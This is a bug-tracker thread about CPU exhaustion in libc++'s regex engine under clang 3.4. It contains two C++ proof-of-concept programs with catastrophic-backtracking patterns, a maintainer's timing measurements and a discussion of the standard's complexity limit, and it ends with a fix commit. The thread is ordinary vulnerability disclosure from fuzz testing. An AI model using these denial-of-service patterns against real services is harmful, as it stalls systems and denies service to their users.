clang 3.4 objective regex resource exhaustion I've discovered cpu exhaustion in regex implementation of libcxx. PoC1: ---------------------------------------------- #include <iostream> #include <regex> #include <string> using namespace std; int main() { try { regex r("(.*(.*){999999999999999999999999999999999})", regex_constants::extended); smatch results; string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||"; if (regex_search(test_str, results, r)) cout << results.str() << endl; else cout << "no match"; } catch (regex_error &e) { cout << "extended: what: " << e.what() << "; code: " << e.code() << endl; } return 0; } ---------------------------------------------- PoC2: ---------------------------------------------- #include <iostream> #include <regex> #include <string> using namespace std; int main() { try { regex r("((((((.*(.*)(.*)(.*).*).*).*).*).*.*)findme)"); smatch results; string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"; if (regex_search(test_str, results, r)) cout << results.str() << endl; else cout << "no match"; } catch (regex_error &e) { cout << "extended: what: " << e.what() << "; code: " << e.code() << endl; } return 0; } ---------------------------------------------- EXPECTED: regex_constants::error_complexity BR, Maksymilian Arciemowicz http://cxsecurity.com/
Thanks for the example. I have reproduced this; varying the number of '9's in the regex: 5 nines -> 0m0.163s 6 nines -> 0m1.643s 7 nines -> 0m16.254s 8 nines -> 2m41.216s Your example has 33 nines; it should take a nice long time to run :-) 3 * 10^25 minutes. Since there is about 5e^5 minutes in a year, that's on the order of 10^20 years. Technically, this is not a bug, but a QoI issue. The standard states that error_complexity should be thrown when "The complexity of an attempted match against a regular expression exceeded a pre-set level." If libc++ sets that "level" arbitrarily high, then it can take "forever" to process it w/o being non-conforming. As an aside - I tried the "8 nines" test on libstdc++; 21 hours and still going. (vs 3 minutes for libc++)
I didn't find more information about pre-set level. I agree with you that are many kind of interpretation pre-set level. In security aspect this level shouldn't be high but in other case like static code analysis should be high. Don't try compare libc++ and libstdc++. This ticket is an result of my fuzz testing. In libc++ only cpu exhaustion in matching otherwise libstdc++ where multiple issues was defined. I also confirm that in my fuzz testing libc++ was faster than libstdc++. Who can say something more about pre-set level?
(In reply to comment #2) > I didn't find more information about pre-set level. I agree with you that > are many kind of interpretation pre-set level. In security aspect this level > shouldn't be high but in other case like static code analysis should be high. > Don't try compare libc++ and libstdc++. This ticket is an result of my fuzz > testing. In libc++ only cpu exhaustion in matching otherwise libstdc++ where > multiple issues was defined. I also confirm that in my fuzz testing libc++ > was faster than libstdc++. > Who can say something more about pre-set level? Just to be clear; I appreciate the bug report, and I'm glad you're doing fuzz testing against libc++. The comment in the standard about "pre-set level" is the only mention there. I interpreted it as being implementation-defined. Checking the ECMA-262 standard, I found no mention of complexity (search for 'complex'), but I'm still looking.
Fixed by commit 313056.